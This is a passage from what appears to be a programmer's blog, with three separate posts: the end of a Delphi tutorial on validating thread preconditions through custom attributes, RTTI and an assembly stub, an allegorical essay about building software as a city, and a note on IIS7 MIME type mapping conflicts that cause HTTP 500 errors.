  FThread := TSomeThread.Create(Self);

  cmdDoSomeHardWork.Enabled := True;
  cmdStopThread.Enabled := True;
  cmdStartThread.Enabled := False;
end;

procedure TAttrValForm.cmdDoSomeHardWorkClick(Sender: TObject);
begin
  FThread.DoSomeHardWork;
end;

procedure TAttrValForm.cmdStopThreadClick(Sender: TObject);
begin
  FreeAndNil(FThread);
  cmdDoSomeHardWork.Enabled := False;
  cmdStopThread.Enabled := False;
  cmdStartThread.Enabled := True;
end;

procedure TAttrValForm.FormDestroy(Sender: TObject);
begin
  FreeAndNil(FThread);
end;

procedure TAttrValForm.HardWorkCallback;
begin
  ValidateAttributes;
  SetWindowText(Handle, 'Hard work done');
end;

{ TSomeThread }

constructor TSomeThread.Create(AOwner: TAttrValForm);
begin
  ValidateAttributes;
  FEvent := TEvent.Create(nil, False, False, '');
  FOwner := AOwner;
  inherited Create(False);
end;

destructor TSomeThread.Destroy;
begin
  ValidateAttributes;
  if not Terminated then
  begin
    Terminate;
    FEvent.SetEvent;
    WaitFor;
  end;
  FreeAndNil(FEvent);
  inherited Destroy;
end;

procedure TSomeThread.DoSomeHardWork;
begin
  ValidateAttributes;
  FEvent.SetEvent;
end;

procedure TSomeThread.Execute;
begin
  ValidateAttributes;
  while not Terminated do
  begin
    if FEvent.WaitFor = wrSignaled then
      if not Terminated then
        HardWork;
  end;
end;

procedure TSomeThread.HardWork;
begin
  ValidateAttributes;
  FOwner.HardWorkCallback;
end;

end.

The AttributeValidation.inc file referenced in the uses clause above controls RTTI and debug settings, in one line. This pattern makes it easy to use the unit without forgetting to set the appropriate RTTI flags in one unit.

// Disable the following $DEFINE to remove all validation from the project
// You may want to do this with {$IFDEF DEBUG} ... {$ENDIF}
{$DEFINE ATTRIBUTE_DEBUG}

// Shouldn't need to touch anything below here
{$IFDEF ATTRIBUTE_DEBUG}
{$RTTI EXPLICIT METHODS([vcPrivate,vcProtected,vcPublic,vcPublished])}
{$ENDIF}

// This .inc file is also included from AttributeValidation.pas, so
// don't use it again in that context.
{$IFNDEF ATTRIBUTE_DEBUG_UNIT}
AttributeValidation
{$ENDIF}

Finally, the AttributeValidation.pas file itself contains the assembly stub to capture the return address for the caller, and the search through the RTTI for the appropriate method to test in each case. This will have a performance cost so should really only be present in Debug builds.

unit AttributeValidation;

interface

{$DEFINE ATTRIBUTE_DEBUG_UNIT}
{$I AttributeValidation.inc}

uses
  System.Rtti;

type
  // Base class for all validation attributes
  ValidationAttribute = class(TCustomAttribute)
    function Execute(Method: TRTTIMethod): Boolean; virtual;
  end;

  // Will log to the debug console whenever a deprecated
  // function is called
  DeprecatedAttribute = class(ValidationAttribute)
    function Execute(Method: TRTTIMethod): Boolean; override;
  end;

  // Base class for all thread-related attributes
  ThreadAttribute = class(ValidationAttribute);

  // This indicates that the procedure can be called from
  // any thread.  No test to pass, just a bare attribute
  ThreadSafeAttribute = class(ThreadAttribute);

  // This indicates that the procedure must only be called
  // in the context of the main thread
  MainThreadAttribute = class(ThreadAttribute)
    function Execute(Method: TRTTIMethod): Boolean; override;
  end;

  // This indicates that the procedure must only be called
  // in another thread context.
  NotMainThreadAttribute = class(ThreadAttribute)
    function Execute(Method: TRTTIMethod): Boolean; override;
  end;

  TAttributeValidation = class helper for TObject
{$IFDEF ATTRIBUTE_DEBUG}
  private
    procedure IntValidateAttributes(FReturnAddress: UIntPtr);
{$ENDIF}
  protected
    procedure ValidateAttributes;
  end;

implementation

uses
  Winapi.Windows,

  classes;

{ TAttributeValidation }

{
 Function:    TAttributeValidation.ValidateAttributes

 Description: Save the return address to an accessible variable
              on the stack.  We could do this with pure Delphi and
              some pointer jiggery-pokery, but this is cleaner.
}
{$IFNDEF ATTRIBUTE_DEBUG}
procedure TAttributeValidation.ValidateAttributes;
begin
end;
{$ELSE}
{$IFDEF CPUX64}
procedure TAttributeValidation.ValidateAttributes;
asm
  push rbp
  sub  rsp, $20
  mov  rbp, rsp
                          // rcx = param 1; will already be pointing to Self.
  mov  rdx, [rbp+$28]     // rdx = param 2; rbp+$28 is return address on stack
  call TAttributeValidation.IntValidateAttributes;

  lea  rsp, [rbp+$20]
  pop  rbp
end;
{$ELSE}
procedure TAttributeValidation.ValidateAttributes;
asm
                            // eax = Self
  mov edx, dword ptr [esp]  // edx = parameter 1
  call TAttributeValidation.IntValidateAttributes
end;
{$ENDIF}

{
 Function:    TAttributeValidation.IntValidateAttributes

 Description: Find the closest function to the return address,
              and test the attributes in that function.  Assumes
              that the closest function is the correct one, so
              if RTTI is missing then you'll be in a spot of
              bother.
}
procedure TAttributeValidation.IntValidateAttributes(FReturnAddress: UIntPtr);
var
  FRttiType: TRttiType;
  FClosestRttiMethod, FRttiMethod: TRTTIMethod;
  FAttribute: TCustomAttribute;
begin
  with TRttiContext.Create do
  try
    FRttiType := GetType(ClassType);
    if not Assigned(FRttiType) then Exit;

    FClosestRttiMethod := nil;

    // Find nearest function for the return address
    for FRttiMethod in FRttiType.GetMethods do
    begin
      if (UIntPtr(FRttiMethod.CodeAddress) <= FReturnAddress) then
      begin
        if not Assigned(FClosestRttiMethod) or
            (UIntPtr(FRttiMethod.CodeAddress) > UIntPtr(FClosestRttiMethod.CodeAddress)) then
          FClosestRttiMethod := FRttiMethod;
      end;
    end;

    // Check attributes for the function
    if Assigned(FClosestRttiMethod) then
    begin
      for FAttribute in FClosestRttiMethod.GetAttributes do
      begin
        if FAttribute is ValidationAttribute then
        begin
          if not (FAttribute as ValidationAttribute).Execute(FClosestRttiMethod) then
          begin
            Assert(False, 'Attribute '+FAttribute.ClassName+' did not validate on '+FClosestRttiMethod.Name);
          end;
        end;
      end;
    end;
  finally
    Free;
  end;
end;
{$ENDIF}

{ ValidationAttribute }

function ValidationAttribute.Execute(Method: TRTTIMethod): Boolean;
begin
  Result := True;
end;

{ MainThreadAttribute }

function MainThreadAttribute.Execute(Method: TRTTIMethod): Boolean;
begin
  Result := GetCurrentThreadID = MainThreadID;
end;

{ NotMainThreadAttribute }

function NotMainThreadAttribute.Execute(Method: TRTTIMethod): Boolean;
begin
  Result := GetCurrentThreadID <> MainThreadID;
end;

{ DeprecatedAttribute }

function DeprecatedAttribute.Execute(Method: TRTTIMethod): Boolean;
begin
  OutputDebugString(PChar(Method.Name + ' was called.'#13#10));
  Result := True;
end;

end.

There you have it — a “real” use case for attributes in Delphi. The key advantages I see to this approach, as opposed to, say function-level assertions, is that a birds-eye view of your class will help you to understand the preconditions for each member function, and these preconditions can be consistently and simply tested.

Using a class helper makes it easy to inject the additional functionality into every class that is touched by attribute validation, without polluting the class hierarchy. This means that attribute tests can be seamlessly added to existing infrastructure and Delphi child classes such as TForm.

Full source: AttrVal.zip. License: MPL 2.0. YMMV and use at your own risk.

The Beautiful City of Software

A new frenzy grips the architects, the builders, the carpenters, the painters. The buildings must be changed, must grow, now, now, today. And so they scurry, nailing on curlicues and raising floors, tearing down this staircase, putting up this ladder, and at the end of the day they step back, look up, shake hands and agree to do it again tomorrow, now, now!

GHA40226In the midst of the twisted roadways runs the river, and across its waters lies a bridge. Call it London Bridge. Not designed. Just happened. And always growing, this way and that way, a feature here, don’t like that one there any more, should bring this railing up to spec, cries the engineer, whilst beside him the others hammer together the new houses that crowd the bridge’s fragile shoulders, and yet again it crumbles, down into the rushing waters, patched even as it falls, and saved at the last moment by the railing that the engineer brought up to spec. But touch not the railing now, lest the whole bridge collapse. Heedlessly, the crowds continue to cross the bridge.

Nestled amongst the towers of this city is a little house. Built by yours truly, it has gables and stands proudly on its own foundations. No one knows how I mixed the concrete, how I discovered for myself the secret formulas of the masons. For now it stands, mirroring the towering edifices surrounding it, calling for its own moment in the light. Crudely, yet lovingly, its facets are shaped, aping the towers’ gleaming edges.

For none can see the bones of those towers now, save in the dreams, nay horrors, of the men who built them. Carefully, the gleaming panels were draped over, and hid the gross deformities beneath a respectable skin. The towers reach skyward, bastions of the city, and all seek to build their own towers in homage to them.

None can see the bones? I speak falsely. There are those who live beneath the surface of the living, creaking city. They crawl inside the hidden and forgotten ways, and learn its secrets, for good, for evil and for love of learning secrets. Some, graspers, take their knowledge, and shake the towers with it, as the owners rush to protect and rebuild, patching the bones with sticking plasters and casts painted in cheerful colours.

No one notices the bones of my little house. Bones no better than those of the towers, if a little smaller.

In the University, I discover how to build a crystal palace, beautiful, fragile and empty, devoid of purpose. Perfect in every way except one. For it has no doors and doors cannot be added. I cannot take the bones from the palace and put them into my house. The crystal bones resile from my rough-hewn timber tresses. They shatter.

I hear the men building in a frenzy and the monster grips me too. I rush from room to room of my house, desperate for change and fame and wealth, shifting this, nailing that, never noticing the damage I wreak until out of breath I stop and look back, just in time, recoiling as I realise how close I came to losing my soul. I run from my house, shaking off the claws of the monster as it howls impotently at me, you’ll get left behind!

Down in the market, I wander from stall to stall. Buy this paint! Use these magic bones: make your house into a tower! Be noticed! My house must be festooned with gargoyles to protect those who enter from the crawlers beneath the city’s skin! The noise is unsettling, the message now bland and tasteless. The graspers watch me walking through, asking themselves if I have anything of worth.

Beyond the market lies the city hall, where the men of import gather. I spin a tale of the beauty of my house, desperate to be noticed, and how strong its bones, how elegant its gables. One man turns and sees me, offers wealth beyond my dreams. But inside my heart I now know he offers only the chance to take my house, my pride, for himself, and tear it apart and spread the best of its blocks amongst his towers. And so I reject him, and again I flee.

But then I find the man in the corner of the market. He has no charms to sell me. Instead he tells me of those who still secretly live in the city, building houses with pride, each more robust and trustworthy than the last, and though sometimes they look toward the gleaming edifices wistfully, yet they themselves were once crawlers beneath the surface, for the love of learning secrets. These men and women are gathering, slowly, he tells me, into a guild. A guild that will protect and honour and create buildings that last, unlike those on the bridge, crumbling and tumbling even now, unlike the towers, gleaming and perfect and rotten to the core.

This time of growth and pain and foolishness must be endured, but it shall pass. The wise men of the University shall join us, he proclaims, and together we shall build with beauty and strength. Gradually the towers shall each fail and fall and be replaced by virtuous buildings of grace, beauty and strength, built with love and care for those who live inside them.

I ask if I may join their guild, and ungrudgingly he bids me welcome, and willingly I set myself to learn.

Making global MIME Type mapping changes in IIS7 can break sites with custom MIME Type mappings

One of the most irritating server configuration issues I’ve run across recently emerged when adding global MIME type mappings to Microsoft Internet Information Services 7 — part of Windows Server 2008 R2.

Basically, if you have a MIME type mapping in a domain or path, and later add a mapping for the same file extension at a higher level in the configuration hierarchy, any subsequent requests to that domain or path will start returning HTTP 500 server errors.

You will not see any indication of conflicts, when you change the higher level MIME type mappings, and you typically only discover the error when a user complains that a specific page or site is down.

When you check your logs, you’ll see an error similar to the following:

\\?\C:\Websites\xxx\www\web.config ( 58) :Cannot add duplicate collection 
    entry of type 'mimeMap' with unique key attribute 
    'fileExtension' set to '.woff'

Furthermore, if you try and view the MIME types in the path or domain that is faulting within IIS Manager, you will receive the same error and will not be able to either view or address the problem (e.g. by removing the MIME type at that level, which would be the logical way to address the problem).  The only way to address the problem in the UI view is to remove the global MIME mapping that is conflicting — or manually edit the web.config file at the lower level.

Not very nice — especially on shared hosts where you may not control the global settings!

See also http://stackoverflow.com/questions/13677458/asp-net-mvc-iis-7-5-500-internal-server-error-for-static-content-only